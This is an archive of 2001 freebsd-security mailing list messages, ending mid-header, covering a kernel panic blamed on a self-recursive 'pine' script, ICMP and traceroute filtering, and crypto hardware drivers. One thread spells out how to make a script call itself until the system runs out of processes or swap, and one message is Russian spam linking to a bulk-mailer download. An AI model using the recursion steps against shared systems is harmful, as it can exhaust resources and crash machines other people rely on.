From owner-freebsd-security Sun Jun 24 2: 2: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 2D9E337B401; Sun, 24 Jun 2001 02:01:39 -0700 (PDT) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f5O91al92800; Sun, 24 Jun 2001 02:01:36 -0700 (PDT) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: , , , Subject: RE: Kernel Panic Date: Sun, 24 Jun 2001 02:01:34 -0700 Message-ID: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal In-Reply-To: <200106221156.AA442106040@stmail.pace.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That would be impossible unless you had "." in your path. If you did (which is a very BAD thing) then yes your script probably loaded itself (assuming you named it "pine). This is why the system defaults to NOT having "." in the path. However, if the script DID load itself, a recursive script under an ordinary user ID isn't allowed to crash the system. I'd be very interested in seeing someone who thinks differently post a script that could do this. The ordinary users have limits restrictions that styme forkbombs and such like that. Of course, if a setuid-to-root binary has a programming bug that allows an ordinary user to call it recursively, then all bets are off. But pine is not normally setuid to root. But, since you are apparently so determined to NOT believe that your system has a hardware problem, in the interests of putting this issue to final rest, here is what I did on my own system (FreeBSD 4.2) 1) Logged in as an ordinary user 2) Issued the commands PATH=.:$PATH export PATH 3) Created the script: #!/bin/sh ./pine -i rm -rf $HOME/dead.letter (note that not only did I put current directory in my path - I forced the script to reload itself just to be as convincing as possible) 4) Then issued the command: pine 5) After about 16 seconds, I got this error message: ./pine: Cannot fork: Resource temporarily unavailable and the script exited and came back to the $ prompt. And, just for the sake of argument, I ALSO did the exact same thing as the root user, and got the exact same response. Please, you need to give the FreeBSD developers credit for SOME sense at least. Your not the only one that has ever built a recursive script by accident, you know. FreeBSD is not so fragile that this kind of thing is going to kill it. Like I said, you need to focus your attention on your disk subsystem. The script you built, called recursively, creates an intense burst of disk activity until the system runs out of resources. It's that burst of activity that's taking your system down, not the fact that the recursive script is consuming all free resources. Undoubtedly, if you were to run other equally disk-intensive programs on your machine they would cause it to crash as well. If you don't want to believe you have a hardware problem then fine, but please don't throw unwarranted stones at the OS in place of that. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com >-----Original Message----- >From: owner-freebsd-questions@FreeBSD.ORG >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Jonathan Slivko >Sent: Friday, June 22, 2001 8:56 AM >To: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG; >freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG; Ted >Mittelstaedt >Subject: RE: Kernel Panic > > >I think I see what caused the kernel to crash. What happened was >this, I believe, is that since I didn't specify the regular pine >binary, the script just loaded itself, thus throwing it into a >loop. It's really a sad situation. -- Jonathan > >______________________________________________ >Jonathan M. Slivko >Technical Support, Black Lotus Communications >http://www.blacklotus.net -- check us out! >---------------------------------------------- > > > >---------- Original Message ---------------------------------- >From: "Ted Mittelstaedt" >Date: Thu, 21 Jun 2001 23:34:02 -0700 > >>That absolutely will not crash a FreeBSD system that's not >>got other problems. >> >>However, what I think is going on here is that the system that >>you ran this on has buggy disk hardware. It's probably some >>IDE disk, right? >> >>I've got a system here that I've tried 5 different IDE paddle >>cards in, and on every one I've tried installing FreeBSD and >>doing different operations and within about 20 minutes I >>had crashed it and screweged the filesystem. >> >>I finally got so annoyed I dug up an old AHA1520 SCSI card >>and slapped a 1GB SCSI disk on it (the system isn't intended >>to be doing anything fancy) and it's been solid as a rock >>ever since. The best conclusion I have is that the ISA bus >>in the system has some clock speed error that doesen't affect >>the SCSI disk system. >> >>Ted Mittelstaedt tedm@toybox.placo.com >>Author of: The FreeBSD Corporate Networker's Guide >>Book website: http://www.freebsd-corp-net-guide.com >> >> >>>-----Original Message----- >>>From: owner-freebsd-questions@FreeBSD.ORG >>>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of >Jonathan Slivko >>>Sent: Thursday, June 21, 2001 4:59 PM >>>To: freebsd-questions@FreeBSD.ORG; freebsd-stable@FreeBSD.ORG; >>>freebsd-security@FreeBSD.ORG >>>Subject: Kernel Panic >>> >>> >>>Hello, >>> >>>I just wrote a little shell script that, on the machine I tested >>>it on, crashed the box and forced a reboot. The contents of the >>>script was: >>> >>>#!/bin/sh >>>pine -i >>>rm -rf $HOME/dead.letter >>> >>>Thats the whole script. I don't see how something like that >could >>>cause a kernel to crash. Would anyone mind trying to replicate >>>this on a test box. If it's a security issue, i'll forward it to >>>security when I get more information. >>> >>>-- Jonathan >>> >>>______________________________________________ >>>Jonathan M. Slivko >>>Technical Support, Black Lotus Communications >>>http://www.blacklotus.net -- check us out! >>>---------------------------------------------- >>> >>>_________________________________________________________________ >__ >>>___ >>>Sent via the Pace University Mail system at stmail.pace.edu >>> >>> >>> >>> >>> >>>To Unsubscribe: send mail to majordomo@FreeBSD.org >>>with "unsubscribe freebsd-questions" in the body of the message >>> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-stable" in the body of the message >> > > >___________________________________________________________________ >___ >Sent via the Pace University Mail system at stmail.pace.edu > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 3:47:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx7.port.ru (mx7.port.ru [194.67.23.44]) by hub.freebsd.org (Postfix) with ESMTP id 0D0F637B405 for ; Sun, 24 Jun 2001 03:47:17 -0700 (PDT) (envelope-from e-marketing@mail.ru) Received: from bmstu-icn.bmstu.ru ([195.19.33.92] helo=localhost) by mx7.port.ru with smtp (Exim 3.14 #1) id 15E7QC-0006q4-00 for freebsd-security@FreeBSD.org; Sun, 24 Jun 2001 14:47:16 +0400 X-Sender: e-marketing@mail.ru Subject: Job Offer From: e-marketing@mail.ru To: "freebsd-security@FreeBSD.org" X-Priority: 1 Reply-To: e-marketing@mail.ru Date: Sat, 23 Jun 2001 23:06:04 +0400 MIME-Version: 1.0 X-MailLibrary: Internet Mail Template 3.03, http://www.Princen-IT.nl/Clarion Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org =C7=E4=F0=E0=E2=F1=F2=E2=F3=E9=F2=E5!! =C2=E0=F1 =EF=F0=E8=E2=E5=F2=F1=F2=E2=F3=E5=F2 e-Marketing Center. =CF=F0=E5=E4=EB=E0=E3=E0=E5=EC =C2=E0=EC =F0=E5=E0=EB=FC=ED=FB=E5 =F1=EF=EE= =F1=EE=E1=FB =E7=E0=F0=EE=E1=EE=F2=EA=E0. =CA=EE=ED=F2=E5=ED=F2 =ED=E0=F8=E5=E3=EE =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=FF= : -Multi-Level-Marketing-=EF=F0=EE=E3=F0=E0=EC=EC=E0 =EC=E3=ED=EE=E2=E5=ED=ED= =EE=E3=EE =E7=E0=F0=EE=E1=EE=F2=EA=E0 -=C2=EE=E7=EC=EE=E6=ED=EE=F1=F2=FC =EF=EE=EB=F3=F7=E5=ED=E8=FF =E1=E5=F1=EF= =EB=E0=F2=ED=FB=F5 =EA=E0=F0=F2 Visa, American Express, Master Card -=C1=E5=F1=EF=EB=E0=F2=ED=FB=E5 e-Marketing Books-=F2=E5=F5=ED=EE=EB=EE=E3= =E8=FF =F0=E0=F1=EF=F0=EE=F1=F2=F0=E0=ED=E5=ED=E8=FF =E8 =EF=F0=EE=E4=E0=E6= =E8 -=CB=F3=F7=F8=E8=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB =EF=F0=E8=E2=EB=E5=F7=E5=ED= =E8=FF =F0=E5=F4=F4=E5=F0=E0=EB=EE=E2 -=CF=EE=E4=EF=E8=F1=EA=E0 =ED=E0 =F1=F0=E0=F1=F1=FB=EB=EA=F3 =EF=E8=F1=E5= =EC =EE =E2=E8=F0=F2=F3=E0=EB=FC=ED=EE=EC =EC=E0=F0=EA=E5=F2=E8=ED=E3=E5-= =E1=E5=F1=EF=EB=E0=F2=ED=FB=E5 =F0=E5=EA=EE=EC=E5=ED=E4=E0=F6=E8=E8 =E8 =F2.=E4. =CF=EE=E4=F0=EE=E1=ED=E0=FF =E8=ED=F4=EE=F0=EC=E0=F6=E8=FF =ED=E0 =ED=E0=F8= =E5=EC =F1=E0=E9=F2=E5 http://www.e-marketing.boom.ru =D1 =F3=E2=E0=E6=E5=ED=E8=E5=EC, e-Marketing Center =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D =D1=EE=EE=E1=F9=E5=ED=E8=E5 =F1=E3=E5=ED=E5=F0=E8=F0=EE=E2=E0=ED=EE =EF=EE= =F7=F2=EE=E2=EE=E9 =EF=F0=EE=E3=F0=E0=EC=EC=EE=E9 =E4=EB=FF =F0=E0=F1=F1=FB= =EB=EA=E8 =ED=EE=E2=EE=F1=F2=E5=E9 NewsMailer v1.3 Download: http://www.softtrade.ru/filez/emailer.zip Please go to http://www.softtrade.ru= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 8:10:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id BB7A037B406 for ; Sun, 24 Jun 2001 08:10:32 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA82473; Sun, 24 Jun 2001 17:10:31 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> From: Dag-Erling Smorgrav Date: 24 Jun 2001 17:10:31 +0200 In-Reply-To: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> Message-ID: Lines: 52 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Kris Anderson" writes: > You can put in a rule like > > ipfw add 3 deny icmp from any to FF.FF.FF.FF via F0 > [...] AUUUUGH! First - the only one who got it right is Brooks Davis: no, it can't be done. The best you can hope for is to prevent your own box (and anything behind it, if it's a gateway) from responding to certain specific types of traces, but the tracer will still be able to see most of the route between you and him, and there are ways of tracing a route that you can't block without also blocking a lot of legitimate traffic. Second - traceroute is pretty harmless, and not really the corner- stone of 3v1l h4ckd0m you people seem to think it is, so even if you could prevent anyone from tracerouting you it wouldn't make much (or even any) difference to an attacker's ability to harm you. Third - if you set up ipfw to unconditionally block ICMP (whether in the mistaken belief that it will prevent route tracing or for some other lameass reason), I will personally buy a very heavy baseball bat, hop on a plane, and pay you a visit you'll remember for the rest of your very short lives. Although some ICMP types are admittedly not very useful, that doesn't mean none of them are, and you should at the very least let types 3 and 11 through or you'll be very sorry. I usually set up my filters to let 0, 3, 8 and 11 through and block everything else. Fourth - this subject has been discussed to death on this very list several times in the past. We keep searchable archives for a reason. Fifth - someone mentioned stealth routing. There's no such thing in FreeBSD, but there's something called stealth forwarding, which I wrote*, and which makes the TCP/IP stack neither decrement nor even inspect the TTL on forwarded packets, so if someone traceroutes a host behind you you won't show up in the trace, but if someone traceroutes you it'll be business as usual. You need to add the IPSTEALTH option to your kernel to enable support for this (and toggle a sysctl variable to actually turn stealth forwarding on). DES -- Dag-Erling Smorgrav - des@ofug.org * It went a bit like this: Friend: "Sun have this new firewall product that's really cool, it can do blah blah blah" - Me: "Oh, FreeBSD can do that" - Friend: "No, it can't" - Me: "Yes, it can" - Friend: "No it can't, because blah blah blah" - Me: "Oh, I see" "Now FreeBSD can do that too" - Friend: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 8:49: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 166B937B405; Sun, 24 Jun 2001 08:48:56 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA82575; Sun, 24 Jun 2001 17:48:48 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Soren Kristensen Cc: hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD References: <3B33A891.EC712701@soekris.com> From: Dag-Erling Smorgrav Date: 24 Jun 2001 17:48:47 +0200 In-Reply-To: <3B33A891.EC712701@soekris.com> Message-ID: Lines: 27 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Soren Kristensen writes: > As I now has prototypes avaliable of low cost PCI and MiniPCI boards, > moving to production in a couple of weeks, I would like to check up on > the work, as I would really like to see FreeBSD support. The boards are > now supported in OpenBSD 2.9. OK, so if I understand correctly, the encryption hardware in question offers a high-speed hardware implementation of the encryption algorithms used by IPSec, so it's a matter of a) having support code that interfaces with the hardware, possibly with a device interface to allow userland apps access to the encryption hardware and b) making our (well, KAME's) IPSec code use that instead of doing the encryption in software. Is that it, or did I misunderstand something? Now, if you want FreeBSD support for your hardware, all you have to do is find a willing developer , send him a sample board (or preferably two, for a full circuit, but one will do) with complete documentation and any additional resources you are willing and able to provide, and then wait a bit. Simply asking for someone to port the OpenBSD driver will not do - OpenBSD and FreeBSD are not very similar at the kernel level, and as others have stated before in a different context, driver source does not constitute adequate documentation. It helps, but it's neither sufficient nor necessary. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 8:57:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 8ED5C37B401; Sun, 24 Jun 2001 08:57:31 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA82599; Sun, 24 Jun 2001 17:57:26 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Ted Mittelstaedt" Cc: , , , Subject: Re: Kernel Panic References: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com> From: Dag-Erling Smorgrav Date: 24 Jun 2001 17:57:26 +0200 In-Reply-To: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com> Message-ID: Lines: 26 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Ted Mittelstaedt" writes: > That would be impossible unless you had "." in your path. If > you did (which is a very BAD thing) then yes your script probably > loaded itself (assuming you named it "pine). This is why the > system defaults to NOT having "." in the path. No: 1) he simply had the script, named "pine", in a directory that was in his search path (e.g. $HOME/bin), and 2) the reason why you shouldn't have any relative path ("." included) in your search path is that you'd get unpredictible and surprising results, and potentially stumble across trojans (imagine an "ls" binary in some random user's home directory that, when you ran it, installed a setuid shell, or sent spam in your name, before giving you a carefully edited directory listing) > However, if the script DID load itself, a recursive script > under an ordinary user ID isn't allowed to crash the > system. Yes it is, unfortunately. FreeBSD doesn't like running out of swap space. Matt Dillon has been trying to correct this in -CURRENT, but it's not completely fixed yet. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9: 9:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id E195C37B401 for ; Sun, 24 Jun 2001 09:09:47 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 53678 invoked by uid 1000); 24 Jun 2001 16:10:07 -0000 Date: Sun, 24 Jun 2001 18:10:07 +0200 From: "Karsten W. Rohrbach" To: Dag-Erling Smorgrav Cc: Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD Message-ID: <20010624181007.C52432@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Dag-Erling Smorgrav , Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <3B33A891.EC712701@soekris.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="PuGuTyElPB9bOcsM" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Sun, Jun 24, 2001 at 05:48:47PM +0200 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --PuGuTyElPB9bOcsM Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 17:48:47 +0000: > Soren Kristensen writes: > > As I now has prototypes avaliable of low cost PCI and MiniPCI boards, > > moving to production in a couple of weeks, I would like to check up on > > the work, as I would really like to see FreeBSD support. The boards are > > now supported in OpenBSD 2.9. >=20 > OK, so if I understand correctly, the encryption hardware in question > offers a high-speed hardware implementation of the encryption > algorithms used by IPSec, so it's a matter of a) having support code > that interfaces with the hardware, possibly with a device interface to > allow userland apps access to the encryption hardware and b) making > our (well, KAME's) IPSec code use that instead of doing the encryption > in software. Is that it, or did I misunderstand something? i think ipsec crypto abstraction into hardware is one side of the medal, but the other side -- to be polished first -- ist getting openssl onto the iron. for my former employer i had my hands on rainbow crupto hardware. it is a pci card called cryptoswift with a number, indicating the amount of ssl handshakes per second. the company has been renamed to ivea (http://www.ivea.com/). i came across this board since it is used in several "appliance" style boxes such as the intel netsctructure ssl accelerators (drop-in https->http ethernet bridge). they had working support and drivers for 3.x, developed in-house and i started hacking up the code for 4.x, but then i left the company (had to leave the hardware there, of course). as far as i got, my experience with ssl handshake processing in hardware showed me a great improvement, since openssl plugs in the hardware to create random and to create session keys. stream crypto is spoken on the host, but this is done fast and very effieciently. if you offload the handshakes to the iron, most of you sysload goes away, of course. i did not find another vendor in europe that provides a similar chip on a pci card, doing the stuff on the iron on a very high level (the card speaks x.50x ascii armored certificates natively, as far as i could see. it would be interesting if somebody from the u.s. could join in and present a list of available hardware and corresponding vendor. if there is hardware available from a crypto-relaxed country, such as south africa or similar, this would also be _very_ interesting, IMHO. >=20 > Now, if you want FreeBSD support for your hardware, all you have to do > is find a willing developer , send him a sample > board (or preferably two, for a full circuit, but one will do) with > complete documentation and any additional resources you are willing > and able to provide, and then wait a bit. Simply asking for someone > to port the OpenBSD driver will not do - OpenBSD and FreeBSD are not > very similar at the kernel level, and as others have stated before in > a different context, driver source does not constitute adequate > documentation. It helps, but it's neither sufficient nor necessary. as i said, there is a 3.x freebsd driver, would this help? i am not into writing drivers ;-) /k --=20 > Sex is one of the nine reasons for reincarnation ... the other eight > are unimportant. --Henry Miller KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --PuGuTyElPB9bOcsM Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7NhDfM0BPTilkv0YRAq8KAKCtBtfnTgl5cleVcAHUe58TPa9v3gCgudOe Dn+Yw0/NEpr2UbNJZEjnjeQ= =jx0g -----END PGP SIGNATURE----- --PuGuTyElPB9bOcsM-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:11:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id E9E5337B401 for ; Sun, 24 Jun 2001 09:11:35 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 53778 invoked by uid 1000); 24 Jun 2001 16:11:57 -0000 Date: Sun, 24 Jun 2001 18:11:57 +0200 From: "Karsten W. Rohrbach" To: ohshutup@zdnetonebox.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPF rule response Message-ID: <20010624181157.D52432@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , ohshutup@zdnetonebox.com, freebsd-security@FreeBSD.ORG References: <20010622220312.PZQH9852.mta11.onebox.com@onebox.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="OROCMA9jn6tkzFBc" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010622220312.PZQH9852.mta11.onebox.com@onebox.com>; from ohshutup@zdnetmail.com on Fri, Jun 22, 2001 at 03:03:12PM -0700 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --OROCMA9jn6tkzFBc Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Kris Anderson(ohshutup@zdnetmail.com)@2001.06.22 15:03:12 +0000: > Howdy folks, >=20 > I've got a rule in my ipf that is reporting the following to syslog >=20 > : <2>Jun 22 14:51:34 /kernel: ipfw: 3 Deny TCP 195.224.212.72= :21 > :21 in via rl0 >=20 > I have limited understanding but it looks like that some bonehead on > the 195. network is doing some sort of goofy ftp thing to my public_if, > almost as if it was ftp relaying. >=20 > Could somebody unconfuse me as to what this means? it seems that you are mixing up ipf (ipfilter) and ipfw in the first place. a properly configured ipfilter with ftp in-core proxy for keeping state on the sessions would solve it i think. /k --=20 > "In Christianity neither morality nor religion come into contact with > reality at any point." --Friedrich Nietzsche KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --OROCMA9jn6tkzFBc Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7NhFMM0BPTilkv0YRAjUHAJ48ys2Uu6LA3vpDUJAGg3o65+4RBgCgq2oj 4woVqCBljmncub/705yZbYE= =yrQS -----END PGP SIGNATURE----- --OROCMA9jn6tkzFBc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:15:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id BE86A37B401 for ; Sun, 24 Jun 2001 09:15:53 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 53924 invoked by uid 1000); 24 Jun 2001 16:16:14 -0000 Date: Sun, 24 Jun 2001 18:16:14 +0200 From: "Karsten W. Rohrbach" To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host Message-ID: <20010624181614.E52432@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="d8Lz2Tf5e5STOWUP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Sun, Jun 24, 2001 at 05:10:31PM +0200 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --d8Lz2Tf5e5STOWUP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 17:10:31 +0000: > Third - if you set up ipfw to unconditionally block ICMP (whether in > the mistaken belief that it will prevent route tracing or for some > other lameass reason), I will personally buy a very heavy baseball > bat, hop on a plane, and pay you a visit you'll remember for the rest > of your very short lives. Although some ICMP types are admittedly not > very useful, that doesn't mean none of them are, and you should at the > very least let types 3 and 11 through or you'll be very sorry. I > usually set up my filters to let 0, 3, 8 and 11 through and block > everything else. dag, could you please write an rfc based on this? especially the part with the baseball bat sounds very nice to me -- being an netops guy for most of my life. you care for the writing, i care for the beer ;-) > * It went a bit like this: Friend: "Sun have this new firewall product > that's really cool, it can do blah blah blah" - Me: "Oh, FreeBSD can > do that" - Friend: "No, it can't" - Me: "Yes, it can" - Friend: "No > it can't, because blah blah blah" - Me: "Oh, I see" > "Now FreeBSD can do that too" - Friend: hehe, reminds me of this customer's nokia ip-330 sitting in the corner of my lab -- i probably will wipe ipso and this weird-ass checkpoint fw1, replace it with freebsd and ipfilter :-> /k --=20 > who | grep -i blonde | date; cd ~; unzip; touch; finger; mount;\ > gasp; yes; uptime; umount; sleep 600 KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --d8Lz2Tf5e5STOWUP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7NhJOM0BPTilkv0YRAiTvAJwIWxUAK/U04kBJGHV+j3Se0Rm2rgCgoIlq thtejA2Sb8fqldOzutizuNU= =l6N3 -----END PGP SIGNATURE----- --d8Lz2Tf5e5STOWUP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:20:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 2805B37B401; Sun, 24 Jun 2001 09:20:10 -0700 (PDT) (envelope-from 